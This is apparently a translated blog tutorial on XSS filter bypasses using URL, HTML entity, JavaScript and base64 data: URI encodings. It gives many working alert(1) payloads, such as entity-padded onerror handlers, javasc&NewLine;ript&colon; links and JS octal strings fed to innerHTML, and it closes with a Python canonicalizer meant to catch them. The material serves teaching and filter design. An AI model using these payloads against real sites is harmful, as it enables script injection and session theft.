XSS encoding problems and bypasses

Commonly used encoding
URL encoding: a percent sign followed by the two-digit hexadecimal value of the character's ASCII code.
For example, the URL encoding of "/" is %2F.

  # : %23
  . : %2e
  + : %2b
  < : %3c
  > : %3e
  ! : %21
  space : %20
  & : %26
  ( : %28
  ) : %29
  " : %22
  ' : %27

HTML entity encoding: begins with & and ends with a semicolon. For example, "<" is encoded as &lt;
HTML entity encoding (decimal and hexadecimal):
for example, "<" is &#60; in HTML decimal and &#x3c; in HTML hexadecimal.

JavaScript encoding: JS provides four character encoding strategies

  1. Three octal digits, left-padded with 0 if shorter; for example, "<" is encoded as "\074"
  2. Two hexadecimal digits, left-padded with 0 if shorter; for example, "<" is encoded as "\x3c"
  3. Four hexadecimal digits, left-padded with 0 if shorter; for example, "<" is encoded as "\u003c"
  4. For some control characters, the special C-style escapes (such as \n and \r)

Specific exploitation scenarios for each encoding
(1) Base64 encoding
data: URI syntax: data:<resource type>;<encoding>,<content>
So far, most cases where base64 encoding is useful look like this:

  • <a href="controllable point">
  • <iframe src="controllable point">

Here, if the filter blocks <, >, ', " and the word javascript, you can still write the XSS payload using base64 encoding.


Base64-encoding the whole of <img src=x onerror=alert(1)> gives:
PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==

data: URI syntax: data:<resource type>;<encoding type>,<content>

<script>alert(1)</script>
(the <img src=1 onerror=alert(1)> payload is not supported by the a tag, object or iframe)
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
(not supported in Chrome)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
(supported in Chrome and Firefox)

How to use the <a> tag

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">test</a>

Here the payload is placed, base64-encoded, inside a data: URL of type text/html. When the "test" link is clicked, the browser parses the data: URL, decodes the base64 and restores our original

<script>alert(1)</script>, and the window pops up successfully.

Specific exploitation scenarios for each encoding

(2) HTML entity encoding (decimal and hexadecimal)
Browsers do not interpret JS encoding inside ordinary HTML tag attributes. onerror is special: its content is parsed as JS, so it can be encoded with JS unicode escapes, but not everything can be encoded, only the function name. Encoding the whole expression (including the parentheses) fails.

For example, <img src=1 onerror="\u0061\u006c\u0065\u0072\u0074(1)"> pops up a window, as does
<img src=1 onerror="\u0061\u006c\u0065\u0072\u0074`1`">

onerror support: HTML decimal, HTML hexadecimal and JS unicode are supported; JS octal and JS hexadecimal are not.

The semicolon in HTML decimal and hexadecimal encoding can be omitted.
Many leading 0s can be added to the number of an entity to bypass a WAF. For
example, the following code executes successfully:

<img src=1
onerror=
"&#0097;&#0108&#000101&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;">

HTML5 added named entities, such as
&colon; => : (colon) and &NewLine; => line feed

e.g. <a href="javasc&NewLine;ript&colon;alert(1)">click</a>
<a href="javascript:alert(1)">tan</a>

A parser generally splits the work between two components: the lexical analyzer (sometimes called the tokenizer) breaks the input into valid tokens, and the parser analyzes the document structure according to the language's grammar rules to build a parse tree. The lexical analyzer knows how to skip extraneous characters such as blanks and newlines.
<a href="javasc
ript:alert(1)">click</a>

First the HTML entities are decoded, which turns them into a line break and a colon, and the result is then treated as
<a href="javascript:alert(1)">click</a>

It can still execute after the line break because the browser's lexical analyzer skips invalid characters such as blanks and line breaks. The attribute value must be enclosed in single or double quotes when it contains a line break, otherwise the break is not skipped. Carriage return and line feed are skipped in this way; on* event attributes do not get this treatment.
Then the complete statement
<a href="javascript:alert(1)">click</a> executes successfully.

Specific exploitation scenarios for each encoding

(3) JavaScript encoding
The javascript: pseudo-protocol can be used in attribute values,
for example <a href="javascript:alert('xss')">111</a>: clicking 111 triggers a pop-up. Only a few encodings are recognized in JavaScript: JS unicode, JS octal and JS hexadecimal.

The first case:
the value you enter is stored in a variable and eventually reaches a function that executes the string as JS code, such as:

eval(), setTimeout(), setInterval()
All of the above execute strings as JS code.

The second case:

var search = "controllable point";
document.getElementById().innerHTML = search;

Many such situations appear when you search and the page then displays the keyword
you queried. Suppose <, >, ', ", &, % and so on are filtered, and the value is then output to the page. It
stands to reason that this is safe. But we change the value to JS encoding:
for example we take <img src=x onerror=alert(1)> and apply JS octal encoding ==> \74\151\155\147\40\163\162\143\75\170\40\157\156\145\162\162\157\162\75\141\154\145\162\164\50\61\51\76. After the server accepts it, the filter finds nothing to filter, and the value goes into innerHTML.
After JS decoding, our code is restored and injected into the web page. At this point the code executes and the window pops up.

(4) URL encoding
URL encoding can be used after the javascript: pseudo-protocol.
For example: <a href="javascript:%61lert(1)">click me</a> successfully executes the pop-up, but
it cannot be used in img: <img src=x onerror="javascript:%61lert(1)">

This is because the href attribute navigates to the URL inside it, and the URL is decoded. The onerror attribute only executes JS and does not navigate.
At the same time, the URL-encoded payload above can be entity (HTML entity) encoded once more:
<a href="javascript&colon;%61lert(1)">click me</a>
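Every bypass on this page works because a filter inspects the raw attribute value while the browser acts on the decoded one. As an added example (not code from the original post), here is a Python canonicalizer covering the decoding steps sections (1) to (4) describe: HTML entities with leading zeros, missing semicolons and the &NewLine;/&colon; names, the tab/newline stripping browsers apply to URLs, percent-decoding of javascript: URLs, base64 data: URLs, and JS \u, \x and octal escapes. The function names are my own, and the decoding rules are modelled on WHATWG URL/HTML parsing rather than on any single browser.

```python
import base64
import html
import re
from urllib.parse import unquote

# Browsers drop ASCII tab, LF and CR anywhere in a URL and trim leading/trailing
# C0 controls and spaces before reading the scheme, so "javasc&NewLine;ript&colon;"
# still resolves to the javascript: scheme.
_URL_STRIP = re.compile(r"[\t\n\r]")
_LEAD_TRAIL = "".join(chr(c) for c in range(0x21))
# The three JS escape forms the page lists: \uHHHH, \xHH and 1-3 octal digits.
_JS_ESC = re.compile(r"\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2})|([0-7]{1,3}))")


def decode_js_escapes(s):
    """Decode JS string escapes. Deliberately over-approximates: a real engine
    rejects \\u0028 in identifier position, but a filter should not rely on that."""
    def repl(m):
        u, x, o = m.groups()
        return chr(int(u, 16)) if u else chr(int(x, 16)) if x else chr(int(o, 8))
    return _JS_ESC.sub(repl, s)


def canonical_url(attr_value):
    """Return (scheme, body) as a browser would see an href/src attribute value."""
    # html.unescape tolerates &#0097; (leading zeros), &#0108 (no ';'), &NewLine;, &colon;
    s = _URL_STRIP.sub("", html.unescape(attr_value)).strip(_LEAD_TRAIL)
    scheme, sep, body = s.partition(":")
    if not sep:
        return "", s
    scheme = scheme.lower()
    if scheme == "javascript":
        body = unquote(body)  # href is a URL, so %61lert is percent-decoded to alert
    elif scheme == "data":
        head, _, payload = body.partition(",")
        if head.lower().endswith(";base64"):
            body = base64.b64decode(payload).decode("utf-8", "replace")
        else:
            body = unquote(payload)
    return scheme, body


def canonical_handler(attr_value):
    """on* handler: the HTML parser entity-decodes the value, then the JS engine
    decodes string escapes. No percent-decoding happens here, unlike href."""
    return decode_js_escapes(html.unescape(attr_value))


def is_dangerous_url(attr_value):
    """Filter decision taken on the canonical form rather than on the raw bytes."""
    scheme, body = canonical_url(attr_value)
    return scheme == "javascript" or (scheme == "data" and "<script" in body.lower())
```

A filter that runs on the output of canonical_url and canonical_handler sees alert(1) behind each of the page's payloads, while one that matches the raw input sees none of them.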



Source: blog.csdn.net/qq_43665434/article/details/114729725